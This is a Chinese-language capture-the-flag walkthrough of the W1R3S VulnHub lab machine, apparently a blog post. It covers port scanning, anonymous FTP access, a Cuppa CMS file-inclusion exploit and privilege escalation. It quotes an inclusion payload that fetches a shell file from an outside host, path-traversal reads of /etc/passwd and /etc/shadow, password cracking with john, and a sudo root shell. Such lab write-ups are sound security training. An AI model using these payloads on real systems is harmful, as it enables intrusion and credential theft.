W1R3S靶机打靶流程---超级详细版

  • 0x00部署
  • 0x01信息收集
    • 1.识别靶机ip
    • 2.靶机端口扫描
    • 3.漏洞扫描
    • 4.ftp渗透
  • 0x02 web渗透
    • 1.访问web页面
    • 2.扫描页面
    • 3.文件包含利用
    • 4.john破解
    • 5.本地提权

0x00部署

W1R3S靶机: 下载地址
下载好导入Vmware即可,网络配置修改为NAT模式。
宿主机使用:kali2022

0x01信息收集

1.识别靶机ip

使用非root用户进行渗透,保持良好习惯

$ sudo arp-scan -l


扫描也可以使用以下指令:

$ ifconfig //查看本机的ip
$ sudo nmap -sn ip所在网段

但是这个会比arp多出一个ip,不知道是哪个的??,根据之前扫描的结果,可以推断出靶机应该是148。

2.靶机端口扫描

$ sudo nmap --min-rate 10000 -p- ip

使用最小速率为10000来扫描靶机ip开放端口,端口数量为65536个,所以设置10000的速率来进行扫描,其默认是tcp扫描。


开放端口有:21-ftp,22-ssh,80-http,3306-mysql

$ sudo nmap -sT -sV -O -p21,22,80,3306 ip

-sT Tcp扫描
-sV 命令查看端口开放服务所用version
-O 查看系统
扫描至少扫两遍,保持好习惯

UDP虽然不可靠,但是不能忽视,再对udp服务进行扫描

$ sudo nmap -sU -p21,22,80,3306 ip

可以确定开放的端口还是21,22,80,3306(udp的没开)

3.漏洞扫描

$ sudo nmap --script=vuln -p21,22,80,3306 ip  //不知道为啥,速度挺慢的

wordpress是一种php语言开发的内容管理平台,可看作CMS

4.ftp渗透


尝试ftp匿名连接一下靶机,用户名为anonymous,密码为空,成功进入。

binary指令执行之后,可执行文件不会因为使用ftp协议下载而导致文件损坏(.txt文件不会坏)
ls查看当前目录,看到有三个目录,依次进入查看

mget 将文件下载到本地,所有目录下边的内容都下载后,exit退出。


返回本地使用cat依次查看下载的文件
01.txt:

02.txt:得到两串疑似加密的字符

$ hash identifier ‘加密字符’  //可以对加密字符的加密方法进行判断,这里得到的md5加密


找了一个在线md5解密,结果:This is not a password,所以这里不是密码

另一个字符可以看到后边=符号,一般就是base64编码,使用指令进行解密,

03.txt:一个banner

employee-names.txt:这里存放的w1r3s这个公司很多人名信息及职位,可能是有用的数据,记录一下。

worktodo.txt:

这里可能需要前后及上下的翻转:

$ echo ' ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡'|rev
//前后翻转指令,上下翻转使用图片编辑来实现

翻转之后,意识到这里可能没什么信息了—》80

0x02 web渗透

1.访问web页面

访问一下目标ip的80端口:进入到了apache的默认页面,没什么其他信息。

2.扫描页面

利用工具feroxbuster来进行页面扫描,需要先下载。

sudo feroxbuster -u http://ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
//-w来匹配字典

对其中的/wordpress & /administrator目录进行访问,发现wordpress无法访问

对administrator进行访问进入到一个安装目录下,检查,在添加信息之后发现没有创建的权限。


对页面上的信息cuppa cms进行匹配,获取到一条信息xxx.txt,检查一下,发现cuppa cms这个存在文件包含漏洞。

$ searchsploit cuppa cms
$ searchsploit cuppa cms -m xxx.txt



3.文件包含利用

根据文件中的内容提示,可以尝试对http://ip/administrator进行包含利用:
利用Exploit中的payloads:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

这里的target就是靶机ip,cuppa是显示cuppa信息的访问页面,即administrator。访问之后成功显示到包含,尝试利用kali指令读取


利用curl访问,curl 是用于在本地计算机与远程服务器之间传输数据的命令行工具。

sudo curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://ip/administrator/alerts/alertConfigField.php |html2text

html2text是一个python脚本,它将一页html转换成干净、易于阅读的纯ascii文本,格式化一下内容。

发现可以读取到内容,

试试读一下/etc/shadow文件,该文件存放用户名密码,得到了很像密码的两部分信息,分别对应着www-data用户-加密密码,w1r3s用户-加密密码,


利用hash-identifier检查一下,发现没找到,使用john来破解系统密码

4.john破解

将上边的信息存放到hash文件中,再使用指令john hash进行破解:

分别得到:
用户www-data,密码:www-data
用户w1r3s,密码:computer

5.本地提权

ssh22端口开放,所以可利用得到的客户端用户名以及靶机ip来进行ssh连接:

命令格式: ssh 客户端用户名@服务器ip地址

远程连接成功,已切换至w1r3s用户。

$ sudo whoami //查看一下当前用户是谁
$ uname -a //查看系统状态
$ sudo -l //查看当前用户权限

发现当前用户具有所有权限:(ALL:ALL)ALL,直接切换至root用户

$ sudo /bin/bash //可用系统命令执行bash,获取root权限

访问一下root目录,找到flag

【每日打靶练习】靶机渗透实操-W1R3S(易)相关推荐

  1. 【VulnHub靶场】——CFS三层靶机内网渗透实操

    作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...

  2. Goldeneye靶机实操

    Goldeneye靶机实操 信息搜集 webshell 用户提权 新手上路 请多多指教 信息搜集 接好靶机 发现IP为:192.168.8.144 发现 80端口开着 试试打开 用户是Boris无疑, ...

  3. 【每日打靶练习】vulnhub靶机平台--Funbox2(低)

    Funbox靶场练习--低 0x00部署 0x01信息收集 1.主机发现 2.端口扫描 3.信息收集 0x03漏洞挖掘 1.FTP服务漏洞 2.密码爆破(john) 3.SSH公钥认证 4.rbash ...

  4. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  5. CISP-PTE实操练习之综合题讲解(win2008)

    CISP-PTE实操练习之综合题讲解(win2008) 文章目录 CISP-PTE实操练习之综合题讲解(win2008) 前言 一.win2008综合题讲解 1. 第一个key 2. 第二个Key 3 ...

  6. 外贸网站Google推广的实操策略

    传统外贸人对于Google推广一定不陌生,作为海外主流的搜索引擎Google推广一直是开发客户和店铺引流的主要渠道.关于Google推广的文章我相信大家也接触过不少.为了文章有新意,这篇文章关于Goo ...

  7. 玩转DB里的数据—阿里云DMS任务编排之简介和实操

    1.任务编排介绍 数据库是企业IT系统里的重要基础设施,里面存储了大量有价值的数据资产,如:交易数据.客户数据.订单数据,等等.其实,数据库在企业里一直扮演着一个数据生产者(Producer)的角色, ...

  8. 实操长文|评估风控策略效果(全)

    做过风控策略或模型的同学都知道,离线开发规则或模型后需要对其效果做评估,来决定是否可上线使用.那上线部署后,我们也需要对线上的规则模型做多角度的分析评价,来决定规则的下线替换,调松调严等.本篇文章主要 ...

  9. 2021年育婴员(五级)复审考试及育婴员(五级)实操考试视频

    题库来源:安全生产模拟考试一点通公众号小程序 安全生产模拟考试一点通:育婴员(五级)复审考试考前必练!安全生产模拟考试一点通每个月更新育婴员(五级)实操考试视频题目及答案!多做几遍,其实通过育婴员(五 ...

最新文章

  1. inux 软件编译、安装、删除
  2. 《术以载道——软件过程改进实践指南》—第1章1.1节对CMMI的基本认识
  3. 网站优化两大方面谁都不能忽视!
  4. Java 程序死锁问题原理及解决方案
  5. vue post请求后台django接口Forbidden (CSRF token missing or incorrect.)
  6. matlab编程 英文翻译,MATLAB编程,MATLAB programming,音标,读音,翻译,英文例句,英语词典...
  7. Touch 方法属性 映射工具
  8. innerXml,outerXml,innerText的不同
  9. git remote(远程仓库操作)
  10. 互联网创业是没有什么好计划的
  11. python时间段_python--时间段遍历
  12. 论文笔记_S2D.21_2014-CVPR_单张图像的离散-连续深度估计
  13. c语言蛮力法实现背包问题
  14. 使用unity编写简单的弹幕游戏【ten seconds】
  15. php 倒置,PHP依赖倒置案例详解
  16. excel表格转vcf图文教程详解
  17. 146.个性化推荐系统案例介绍
  18. 引申5“生命起源VS电影机械公敌VS大数据、人工智能“
  19. iphone OS、Android、Blackberry OS与Palm OS的比较
  20. 【观察】数字化转型再思考,迎接企业IT“新常态”

热门文章

  1. 004.迭代法求平方根
  2. RationalDMIS2020 使用平移坐标系来批量测量零件并输出EXCEL
  3. mysql优化和sql优化一样吗_mysql数据库的sql优化原则和常见误区
  4. 【MySQL数据库】MySQL 高级SQL 语句一
  5. Ubuntu 16.04 pycharm 设置桌面快捷方式
  6. Import chainer报错:def shape(self) -> types.Shape:
  7. 【电气专业知识问答】问:互感器的功能是什么?
  8. 解析LED防蓝光灯珠技术原理
  9. C语言printf,%0md的输出,一种补足0的输出方式
  10. iOS截屏、给图片添加水印